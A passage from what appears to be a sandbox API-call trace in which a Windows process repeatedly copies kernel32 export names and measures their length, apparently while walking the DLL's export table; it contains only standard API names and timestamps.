lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.558] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.558] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.558] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.558] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.558] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.558] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.558] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.558] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.558] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.558] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.558] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.558] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.558] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.558] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.558] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.558] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.558] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.559] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.559] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.559] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.559] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.559] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.559] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.559] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.559] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.559] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.559] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.559] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.559] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.559] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.559] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.559] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.559] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.559] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.559] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.559] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.560] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.560] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.560] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.560] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.560] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.560] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.560] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.560] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.560] lstrlenA (lpString="COPYFILEA") returned 9 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.560] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.560] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.560] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.560] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.560] lstrlenA (lpString="COPYFILEW") returned 9 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.560] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.560] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.560] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.561] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.561] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.578] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.579] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.581] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.582] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.585] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.585] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.585] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.585] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.585] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.585] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.585] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.585] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.586] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.586] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.586] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.586] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.586] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.586] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.586] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.586] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.586] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.586] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.586] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.586] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.586] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.586] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.586] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.586] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.586] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.586] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.586] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.586] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.587] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.587] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.587] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.587] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.587] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.587] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.587] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.587] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.587] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.587] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.587] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.587] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.587] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.587] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.587] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.587] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.587] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.587] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.587] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.588] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.588] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.588] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.588] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.588] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.588] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.588] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.588] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.588] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.588] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.588] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.588] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.588] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.588] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.588] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.588] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.588] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.588] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.588] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.589] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.589] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.589] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.589] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.589] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.589] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.589] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.589] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.589] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" 